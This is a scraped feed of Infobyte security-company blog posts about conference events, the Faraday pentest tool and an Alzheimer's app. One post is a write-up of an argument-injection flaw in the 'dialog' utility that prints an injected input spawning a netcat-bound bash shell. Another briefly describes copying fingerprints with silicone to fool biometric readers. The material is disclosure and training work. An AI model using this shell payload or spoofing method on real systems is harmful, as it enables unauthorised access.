when it was youre turn to break the box. The only difficulty was that the router had registered the MAC direction of only computers that could access it and for those that wanted to enter after breaking WEP, they had to be listening and analyizng traffic hoping that this computer accessed the router (this happened once per hour) to obtain its MAC.

WORK SHOP

During the three days of the EKO party, it was possible for those interested in this subject to participate more actively in the box challenge. We conducted a workshop of fingerprint copying to be able to infiltrate biometrics readers.




We explained how to do duplicates using Cianocrilate and Silocon to make dental molds to lift the prints and later on how to make a ¨false finger¨ of silicon with the lifted print.

In the workshop neccessary materials were given out and a brief chat was given how to do the procedure.

It´s worth saying that the explained technique is viable currently in the majority of access systems. This shows that not only is it possible to infiltrate these systems in a fast and effective manner, but also with materials that are easy and cheap to get.

CONCLUSIONS

As always we had fun but above all we had the satisfaction of having completed a bet that we had made a long time before to imporve and be able to offer something more than just the normal lockpicking stand.

Also this bet is a big challenge because now we have to one up ourselves every year.

We think that there are people interested in not only lockpicking itself but in everything related to physical security and the reach it has in all factors in a site. Because of this, nowadays its important to take into account the perimeter for example of servers and places where important information is kept. 

While trying to do a fun exercise, all the different mechanisms, sensors, etc should make us remember that for informatics security the physical environment will always be a crucial factor and being able to understand well all components of security should help us improve the protection of information. 




EKOPARTY 2013 - STAND LOCKPICKING 
EQUIPO DE TRABAJO 

RESEARCH, DEVELOPMENT Y MANAGEMENT 
 (Finger Print Workshop  – THE BOX – Stand) 
Juan Urbano Stordeur 
Juani Bousquet 

PROGRAMERS AND OPERATORS
Matías Nahuel Heredia 
Carlos Pantelides 
Alejandro Rusell 

Help
Juan Pablo Vercesi 



The lockpicking stand, the workshop about finger print duplication and the box challenge were developed by Infobyte LLC. and it was made exclusively for the Ekoparty Security Conference 2013 ediciton.

Collaborative Pentesting Workshop in ISSA

$
0
0
August 15th we did our last workshop about Collaborative Pentesting at ISSA Argentina. The main focus of this workshop was the different phases and tasks when you start a team pentest.



During this session we discussed in-depth, collaborative pentests, that are becoming more and more common everyday. We looked at different scenarios where the resources involved in the core business of a client must be protected.  Early detection of these vulnerabilities are essential and are reflected in time, money and the company’s reputation.

REF: Photo of ISSA Session.


Some of the topics were: 

·  Monoplayer VS Multiplayer Pentesting

·  Typical issues during a pentest

·  The current fixes and tools

·  How to run multiplayer projects and take advantage of the different resources

·  How to boost the productivity and how to understand everything when things are running simultaneously





The speakers were Germán Riera and Daniel Foguelman (photo at right), the main developers of Faraday, the first collaborative pentest tool. This tool covers all the requirements of  collaborative pentesting and allows clients and pentesters to have a more productive, fully integrated work station.



A full training is available in the next Ekoparty: “DIVIDE AND CONQUER: MODERN COLLABORATIVE   PENTESTING. It will assess the main concerns regarding a collaborative pentest. How to plan and assign tasks, plan execution and report generation. We will show all the new tools available in a real world environment and we will work in teams to practice and better understand everything one can do while using Faraday.


Training course will come with an exciting test laboratory that will challenge your team skills! Come join us!




Faraday v1.0.4 Release

$
0
0
We are happy to announce Faraday v1.0.4. After three months of heavy development we finally are releasing the newest version!
GUI Web - Dashboard


During engagements, the amount of information generated is massive. 
Keeping track of all the vulnerabilities and associated assets represents a challenge for the everyone.

Since day one we have been designing a tool that helps us in our daily tasks as Penetration Testers, Project Managers and for our Clients.


Changes you will see are more UX/UI related:
  • D3 Includes an impeccable display and eye-catching graphics
  • Vulnerability Status Report
  • Command run user/host identification
  • Vulnerability Statistics
  • Optimisation Refactor
We hope that you can enhance and streamline your work with our new full feature dashboard with D3 visualizations. 
As always, for us quality is of the utmost importance. After long deliberations we decided to change-up our entire persistence layer and we did an entirely fresh rewrite.
Status Report View
Some changes we introduced:
  • Data Mapper pattern implementation
This allow a flexible and scalable design that permits more model object types, and more operations over them!
  • Model Object composite
Well, our old model sucked, it was too coupled and lacked being able to make modifications. We in turn implemented the object composite object and now we can create new types of objects.
  • Reducing controllers responsibilities
Faraday has an MVC architecture, and part of the MVC is the C of Controller. Our main controller had way too many responsibilities. We cut it down quite a bit  (about a thousand lines, 50%).
  • Introduced a new python launcher with upgrade capabilities, please give it a try while running ./faraday.py --update
    
This have been quite a challenge. A big software engineering challenge. How to refactor our persistence layer and move towards a well defined pattern?

Well, we had to do several things from scratch.

Changing our data model in order to use the widely implemented composite pattern was the very beginning on our refactor as we walked straight into the lions mouth while rewriting the persistence layer.

We found limitations in the data access strategy, and implemented the Data Mapper pattern. The idea is that you have mapping objects that translate our model objects into persistable objects. 
Using TDD as our daily testing / development approach is challenging but, what else than excellence is there for us?
Top Services View
https://www.faradaysec.com/
https://github.com/infobyte/faraday
https://twitter.com/faradaysec

We hope you like it!

ekoparty Latin American Awards

$
0
0
The ekoparty Latin America Awards will be an annual awards ceremony premiering for the first time in the 10th edition of the eko Security Conference.

Awards ands VERY elegant statues will be given to commemorate both the achievements and abysmal failures of the Latin American Cyber- Security community.

How to participate?

Using Twitter, you can propose possible nominees to be included on the short list. Using hashtags for each of the awards categories, you select who you think is most deserving of these coveted awards.
.
The ekoparty Selection Committee and its´organizers after all the potential nominees are sent will narrow the list down to three nominees for each category.

After the short lists are decided upon, online voting will commence on the ekoparty web page. The nominee with the most votes in each category will be given the prize at the end of the conference.

Awards will be given in each of the following categories:

// ekoAward a la Trayectoria (lifetime achievement award)
This award goes to the individual who has made significant contributions to the community throughout the years. The winner is someone who serves as a positive example and source of motivation for the entire cyber-security community.
Twitter hashtag: #ekoAwardTrayectoria

// Ladri Award
The Ladri Award is a way to recognize our friends and colleagues, who like it or not, was a media sensation for doing basically nothing.

Twitter hashtag: #ekoLadriAward

// ekoAward a la Mejor Investigación Latinoamericana del 2014 (Best Latin American Research 2014)
Like the name says, the Award is given for the best research coming out of Latin America in 2014. The award will go to the person or group that released the most significant research for the cyber-security community.
Twitter hashtag: #ekoAwardMejorResearch

// ekoAward a la Destrucción Global de Internet (Global Destruction of the Internet Award)
This award goes to the Latin American that with his research has put us one step closer to completely destroying the internet and bringing us one step closer to the BBS era.
Twitter hashtag: #ekoAwardDestruccionGlobal

// ekoAward al Compromiso Masivo (Massive Security Breach Award)
This award goes to those men and women on the dark side that with a lot of time and dedication they continue to justify why each one of us still has a job.
#ekoAwardCompromisoMasivo



Gold Badge
The Gold Badge is a free lifetime ticket for the eko that the organizer and panelist of judges will give to one deserving individual. This individual will be recognized for his hard work for the eko and his value to the entire community.



Do you want to be a EKOparty ambassador?

$
0
0
EKOparty is looking for people that want to get involved behind the scenes with the EKOparty staff. The idea is to keep on growing what is already the biggest offensive cyber security threat in Latin America, with more and more specialist each year.


If you work in a company or organization that has more than 50 people and you want to be the ambassador, all you have to do is ask five coworkers to nominate you to be the EKOparty ambassador. "I nominate @john doe as the #ekoambassador of X company"

The ambassador will have special exclusive benefits, including, a free ticket to the event, an invitation to the VIP dinner with all the speakers along with lots of other goodies!

All the groups from the company will get a discount on both the event and trainingsAND if that wasn´t enough each member of the group will get a limited edition EKOparty t-shirt.

Looking forward to seeing everyone!


Abusing « dialog » for fun and profit

$
0
0
If you want to design a command-line utility with a graphical user interface, you have the choice of using a full-featured library like curses, or using an utility like « dialog ».
Dialog is a program you can call with arguments specifying what you want to display (input box, menu…).
Here is an example of the result of the « dialog --msgbox "Hello world.\n\nHow are you ?" 0 0 » command :


During a system audit, we had access to a server that only had a command-line GUI interface. This interface presented menus allowing us to do various diagnostics to the server (that would end up executing scripts)...
Of course, our goal was to find a bug in this interface to execute arbitrary code on the server.

After a little analysis, we found out that the whole script for the GUI interface was calling the « dialog » command to display the various dialog presented to the user.

From parameter injection...

We encountered code to execute a diagnostic script, providing it a number as a parameter :
n = ""
while not n.isdigit():
n = dialog_input("Enter a number", n)

system("/root/diagnostic_script %s" % n)
With the dialog_input function being like :
def dialog_input(question, default):
args = shlex.split('dialog --inputbox "%s" 10 50 "%s"' % (question, default))
_, stderr = subprocess.Popen(args, stderr=subprocess.PIPE).communicate()
return stderr.decode()
So, the more obvious way would have been to put a string like "; whoami" in the dialog, to have the system() execute our code.
However, this is made impossible because the number is validated, and if we enter an invalid number we will be asked again.
But what is really interesting is that the old number we entered (that is invalid !) will be set as the default value of the input, by passing it as an argument for the dialog command.
So, what happens if we put a quote in the number we enter ? As it is invalid, dialog_input() is called again, and booom, shlex.split is lost :
Traceback (most recent call last):
...
ValueError: No closing quotation
So, it's obvious that from now, we can inject arguments for the « subprocess.Popen » call (as long as we put an even number of quotes in the dialog).
The scope of what we can do is very limited. We can't use shell tricks like a semicolon or a pipe to execute other commands : subprocess.Popen directly call the « dialog » command (as the shell argument is False by default), so we can only control its parameters.
So, we have to dig into how dialog works. We can see that calls like « dialog --inputbox "foo" 10 50 "bar" --inputbox "foo2" 10 50 "bar2"» works fine, as dialog iteratively parse its argument and allow multiple widgets to be displayed successively.
Let's see if we can find some useful widgets ! After reading the manual, there is « --dselect » that is a directory chooser (so we can see the content of the filesystem), and « --textbox » that can display the content of a file :)


So, we have arbitrary (read) access to the filesystem !


... to arbitrary command execution...

However, we also found one very interesting widget : prgbox.
--prgbox command height width
A prgbox is very similar to a programbox.

This dialog box is used to display the output of a command that is specified as an argument to prgbox.

After the command completes, the user can press the ENTER key so that dialog will exit and the calling shell script can continue its operation.
So, this widget was designed… to execute any command.
However, during our trials it was impossible to have it work correctly because each time we put shell commands the behavior was completely unexpected, often resulting in an empty result.

...by working around a nasty bug !

We looked at the source code of the prgbox widget and found that :
sprintf(blob, "-c %s", command);
argv = dlg_string_to_argv(blob); // will convert the command in « blob » to a list of arguments.
execvp("sh", argv);
Which shown clearly that our command was executed using « sh -c command », so using shell should have worked !
However, shouldn't argv[0] contain « sh » ? It is this !
When « sh » was called, its argv[0], instead of containing « sh », was « -c » (so it ignored this argument, thinking it was its name !).
A quick workaround to allow our exploit to work was to insert « -c » at the beginning of the command we passed to the prgbox widget, for sh to correctly have « -c » as its argv[1].
So, at the end we were able to spawn a backdoor shell in our target server, simply by entering this in the input box asking for the IP address to ping :
" --prgbox "-c \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 8000 >/tmp/f\"" 30 70 --title "
Success !

We also contacted the author of dialog to inform him of the bug, that was corrected in the last version of dialog.

It was also very funny to dig into the dialog source code, and see that there is even an option « --file » that allows an user to put more arguments in a file (they will be inserted in place during the process of parsing the arguments). And putting another « --file » option referencing to itself inside such a file could have led to infinite recursion ! So the program contains a counter of the recursion depth and don't allow it to be more than 20.

Conclusion

When you use an external program like dialog, be very careful with what you allow the user to inject in the parameters. As we have just seen, even if the command is not interpreted in the shell, it is possible to misuse the program you are calling to end up executing arbitrary code.

And when we search github for misuse examples, it seems that it is quite easy to encounter…

Lanzamos PictureMe, aplicación para pacientes con Alzheimer

$
0
0
La aplicación contribuye al mejoramiento y calidad de vida de quienes sufren la enfermedad.

PictureMe, una aplicación para smartphones que les permite a quienes sufren la enfermedad registrar cada momento de sus vidas, contribuyendo de esta manera al mejoramiento de su memoria y de su calidad de vida

El Mal de Alzheimer es una terrible enfermedad neurodegenerativa, que afecta a la memoria, al pensamiento, al comportamiento y a las actividades diarias a medida que mueren las células nerviosas (neuronas).
Aparece con mayor frecuencia en personas mayores de 65 años, afectando hoy en día a 37 millones de personas, y debido al aumento de expectativa de la población, se estima que en el 2050 serán 115 millones los que sufrirán este mal.

Si bien hasta hoy el síndrome es incurable, existen diferentes maneras de reducir su impacto.

El prestigioso neurocientífico e investigador Facundo Manes, formado en Harvard y Cambridge, director del “Instituto Alzheimer”  y autor del libro “Convivir con personas con Alzheimer y otras demencias”,
afirma que “una de las estrategias más eficaces para reducir el deterioro cognitivo, es proteger aquellas neuronas sanas”

Siguiendo esta misma línea, y contribuyendo a mejorar la calidad de vida y a atenuar el deterioro cognitivo de quienes se ven afectados, y dentro de las políticas de Responsabilidad Social Empresaria de nuestra compañía, hemos desarrollado PictureMe, que convierte al equipo en un “Instant Life Recorder”, es decir una grabadora instantánea de vida.

PictureMe, aplicación para pacientes con Alzheimer

PictureMe, aplicación para pacientes con AlzheimerPictureMe es una aplicación Open Source y se puede obtener de manera 100 % gratuita, para que todo afectado o el entorno familiar del que sufre la enfermedad pueda acceder a ella. La aplicación va a estar también disponible desde el Android Market los ingresos obtenidos serán cedidos a la ONG Salud Activa, institución sin fines de lucro que tiene como misión mejorar la calidad de vida de las personas y de la comunidad.

PictureMe permite a sus usuarios llevar un registro diario y de cada pocos segundos de su entorno. De acuerdo a Estudios científicos de la Universidad de Cambridge,  se comprobó que la revisión de los acontecimientos diarios documentados en fotos permite mejorar en pacientes con Alzheimer la memoria y la calidad de vida.

Un antecedente de Pictureme es Sensecam, un dispositivo con el mismo objetivo creado por Microsoft, licenciado por diversas empresas para su comercialización. A un costo superior de u$s 400.

Con la popularización de los Smartphones, la mejora continua en las cámaras incorporadas y el aumento de hardware de los dispositivos, PictureMe se convierte hoy en un aliado ideal para la contención de la enfermedad.

Se puede acceder a la aplicación y código de fuente desde aquí:
https://github.com/infobyte/pictureme

Si queres apoyar este proyecto puedes bajarla desde aquí:
https://play.google.com/store/apps/details?id=com.pictureme

Para más información, acceder al sitio web de PictureMe en http://www.pictureme.ws/

PictureMe released, a new app for Alzeimers patients

$
0
0
This new app tries to help improve the quality of live for those that suffer from this terrible disease.

PictureMe, a smartphone app that turns your phone into a life camera, allowing for pictures to be taken every few seconds. Studies have been shown that this helps to offset memory loss, improving the quality of life for those with the disease.


Alzheimer is a neuro- degenerative disease, that affects one´s memory, thought, behavior and daily activities that many of us take for granted. This is due to the gradual loss of nervous system cells.

The ailment is most prevelant in those over 65, affecting over 37 million people today and given the general greying of the population, its estimated that in 2050 there will be over 115 millon people suffering from this dissease.

Although there is of yet no known cure, there are different ways to alleviate its impact.

The prestigious neuro-scientist and researcher (studied and worked in both Harvard and Cambridge) Facundo Manes, stresses that one of the most effective strategies for reducing  cognitive deterioration, is to try to protect healthy neurons¨.

Following Infobyte´s strong commitment to corporate social responsibility, we have developed PictureMe, that instantly records photos for the wearer and allows them to review these photos at the end of the day or whenever they want. This is shown to reduce memory loss and protect neurons.

PictureMe, aplicación para pacientes con AlzheimerPictureMe is an Open Source app and can be obtained 100% free, for those with these disease or for a family member looking to help. The app will be available on the Google Play App store and all proceeds will be donated to the the NGO, Salud Activa (http://www.saludactiva.org.ar/), a not-for-profit working to improve the quality of life of those with dementia and alzheimers and works to improve awareness and treatment in the community.

The predecessor of PictureMe was Sensecam, a device with the same goal made by Microsoft and licensed to different businesses for its commercialisation with a price of over $400.

With the popularization of Smartphones, including having multiple cameras and the rapid imporvement of both the hardward and software of the devices it is not quite easy to have this tool with out spending a fortune. PictureMe is now an ideal ally in the fight against Alzheimers.


You can download the app as well the source code here:
https://github.com/infobyte/pictureme

If you want to support the project and want to download it, check out:
https://play.google.com/store/apps/details?id=com.pictureme

For more information, go to http://www.pictureme.ws/

ekoparty 2014 - Lockpicking Game

$
0
0
Returning this year we will be running the Lockpicking stand in the 10th edition of the ekoparty!


This year the idea is to recreate a physical space, where the participants are going to have to use all their smarts and abilities to identify and obtain important information, and then to penetrate and isolate the different challenges. The challenges willl test the participants´ knowledge both in physical and cyber security.

The access control will be tricky to get into because there will be numerous types of locks (skeleton keys, padlocks and yale locks, biometrics as well as a few surprises)

To be able to overcome the different steps in the Box challenge it will be necessary to research and exploit various vulnerabilities. Some will be familiar and others will not so much such a s a cryptography challenge and a binary analysis. 

The challenge will be completed in groups and its fundamental that the participants think of a good strategy or how best to collaborate to be able beat the BOX. Those that pass the largest quantity of challenges in the least time will be the winner.


The award will be announced before the beginning of the EKOparty.

Materials:
  • The use of your own computer will be allowed, where it will be possible to use your own scripts or individual tools.
  • A good attitude looking to have some fun!


We leave you with a sketch of what you will find!



See you guys there!

Project Team:
Juan Urbano Stordeur
Juani Bousquet
Nicolas Trippar
Andres Pablo Sanchez
Korantin Auguste


ekoparty 2014 - Lockpicking Game

$
0
0
Nuevamente este año estamos coordinando el area de Lockpicking en la edición numero 10 de la ekoparty!
Para refrescarles un poco la memoria en el siguiente articulo pueden ver lo que realizamos en la edición 2013


Este año la idea es recrear un área física, en donde los participantes van a tener que utilizar todas sus habilidades para identificar, obtener información, vulnerar y aislar desafíos relacionados tanto a la Seguridad Física como Informática. 

El control de acceso al área estará limitada por cerraduras de varios tipos (tambor, trabex, candados, biométria, entre otras cosas). 

Para poder sortear estas será necesario investigar y explotar distintas vulnerabilidades, para distintos escenarios como por ejemplo un desafío de criptografía o de análisis de un binario.
Estos serán algunos de los desafíos que los participantes podrán encontrarse el largo del desarrollo del mismo.

La temática será en grupos, es fundamental que estos deban pensar una estratégica o una manera colaborativa para resolver los mismos, quienes resuelvan la mayor cantidad de desafíos en el menor tiempo serán los ganadores del juego.

El premio sera anunciado antes de iniciar la Ekoparty por las vías oficiales del evento 

Materiales:

  • Se permite el uso de computadoras propias, donde podrá utilizar sus propios scripts o herramientas informáticas.
  • Ganas de divertirse!
Les dejamos un bosquejo de lo que se pueden encontrar!!



Los esperamos!!

Equipo de Trabajo:
Juan Urbano Stordeur
Juani Bousquet
Nicolas Trippar
Andres Pablo Sanchez
Korantin Auguste
Franco Linares

ekoparty 2014 - Auditing thousands of assets at a time without panicking 101

$
0
0
El proximo Miércoles 16hs a 18hs en el Salon Cielo dictamos el workshop "Auditing thousands of assets at a time without panicking 101."

Este workshop pretende introducir a cada asistente a realizar pentests en ambientes colaborativos. Se van a tener en cuenta las fases del pentesting más cruciales, advertencias del trabajo colaborativo y aplicación de técnicas de organización en entornos cooperativos para aumentar la eficiencia y el orden.
Se le permitirá a los participantes realizar un pentest junto con los organizadores del workshop en un ambiente preparado específicamente para resaltar la parte colaborativa del mismo, utilizando distintas herramientas, logrando así un ejercicio más didáctico y fijar lo que se vaya hablando de forma teórica.
La idea principal de la parte práctica es intentar recrear un pentest donde ocurran problemas similares a los que ocurrirían en la realidad en ambientes colaborativos. Este workshop pretende introducir a cada asistente a la realización de pentests en ambientes colaborativos. Se van a tener en cuenta las fases del pentesting más cruciales, posibles complicaciones del trabajo en grupo y la aplicación de técnicas de organización en entornos cooperativos para aumentar la eficiencia y el orden.

Se le permitirá a los participantes realizar un pentest junto con los organizadores del workshop en un ambiente preparado específicamente para resaltar la parte colaborativa del mismo, utilizando Faraday, un entorno de pentest colaborativo. Logrando así fijar los conceptos teóricos.

La idea principal de la parte práctica es intentar recrear un pentest donde ocurran problemas similares a los que ocurrirían en la realidad.









Speakers:

Daniel Foguelman:
Master en Computer Science y docente universitario, Daniel se especializo en Seguridad Informática desde sus primeros años.
Se ha desempeñado en su historia como pentester en Infobyte LLC (entre otras), como desarrollador en diversas tecnologías y arquitecturas, como docente universitario y Core Developer en Faraday.

Matías A. Ré Medina:
Con 5 años de experiencia como Security Researcher en Infobyte LLC, aplicando técnicas de penetration testing enfocado en ataques client side y aplicaciones web.
Actualmente desarrollador de Faraday y core developer de Evilgrade.
Estudiante de Ingeniería de Sistemas, en su ultimo año.
Orador en la conferencia Ekoparty 2013: "All you sextapes belong to us".
Investigaciones: "Brainfuck beware: JavaScript is after you!", "Bypassing WAFs with non­alphanumeric XSS", "Pornographic Image Jacking Algorithm".

Germán Riera:
Ingeniero en Sistemas de la información, actualmente se desempeña como Core Developer en Faraday.
Ha realizado penetration testing, explotación de binarios y ha estudiado criptografía por varios años y continuara haciendolo...

RiseCon - Rosario - 6/7 Noviembre 2014

$
0
0

El 6 y el 7 de Noviembre en Plataforma Lavardén se llevará a cabo RiseCON, el primer evento de seguridad informática en Rosario, reuniendo investigaciones de expertos argentinos y del exterior.


Infobyte LLC es uno de los sponsors del evento adicionalmente estamos organizando la sección de Lockpicking con muchos desafíos para los participantes.

Los asistentes podrán concurrir a presentaciones de gran nivel, impartidas por reconocidos investigadores y profesionales de la seguridad informática. Además tendrán la posibilidad de participar en workshops (gratuitos) y trainings (arancelados), dictados a lo largo de la primera jornada de la conferencia y anotarse en competencias de hacking individuales y en equipo.
En la siguiente imagen pueden revisar la agenda del evento:


Para conocer más sobre el evento visite www.risecon.org

ekoparty 2014 - Auditing thousands of assets at a time without panicking 101

$
0
0


This Wed from 4pm to 6pm in the Salon Cielo, we will conduct a workshop "Auditing thousands of assets at a time without panicking 101."

This workshop will try to introduce to each attendee how to conduct a pentest in a collaborative environment. This workshop is going to try to explain how best to manage  different critical phases of a pentest. Additionally, it will deal with the different problems that can sometimes arise and the different techniques used by collaborative pentesters to increase efficiency and stay organized.

It will let the pentesters try a pentest together with the organizers of the workshops in an ideal practice environment. We will use different tools to do an interactive exercise and talk a little bit about theory as well.The most important part of course, will be the practical part where we will try to simulate problems that happen in real life. Our new product Faraday will be used to help confront these problems.

The idea is to do a practice run so we can recreate the problems that happen to pentesters in as realistic a setting as possible.
















Speakers:

Daniel Foguelman:
Masters in Computer Science and university teacher, Daniel has specialized in IT security for many years. He has worked as a pentester for many in Infobyte LLC  and has been a developer for diverse technologies and archuitectures. He is a Core Developer of Faraday.

Matías A. Ré Medina:
Con 5 años de experiencia como Security Researcher en Infobyte LLC, aplicando técnicas de penetration testing enfocado en ataques client side y aplicaciones web.
Actualmente desarrollador de Faraday y core developer de Evilgrade.
Estudiante de Ingeniería de Sistemas, en su ultimo año.
Orador en la conferencia Ekoparty 2013: "All you sextapes belong to us".
Investigaciones: "Brainfuck beware: JavaScript is after you!", "Bypassing WAFs with non­alphanumeric XSS", "Pornographic Image Jacking Algorithm".

With more than 5 years of experience as a Security Researcher with  Infobyte LLC, focusing on web application and client side attacks.
Currently he is developing Faraday y core developer of Evilgrade..

Germán Riera:
Ingeniero en Sistemas de la información, actualmente se desempeña como Core Developer en Faraday.
Ha realizado penetration testing, explotación de binarios y ha estudiado criptografía por varios años y continuara haciendolo...

IT Systems engineer who is currently  a core developer of Faraday. He´s done penetration testing, binary exploitation and has studied cryptography.

RiseCon - Rosario - 6/7 November 2014

$
0
0

November 6th and 7th in Plataforma Lavardén will host RiseCON, the first IT security event in Rosario with talks from Argentine and international experts.


Infobyte LLC is one of the sponsors of the event and on top of that we´ll be organizing the Lockpicking area with a number of different challenges for the participants.

Attendees will be able to listen to high quality talks by internationally recognized speakers and be surrounded by other IT security professionals. Additionally, RiseCONers will be able to participate in workshops (free) and trainings (with a small fee) given throughout the conference. Of course, people will also be able to do individual and team based hacker competitions, as well. 
You can check out the event schedule below (Day 1, Thursday November  6 2014 and Day 2, Friday November 7, 2014)


It if you want to learn more about the event, visit www.risecon.org
Viewing all 236 articles
Browse latest View live




Latest Images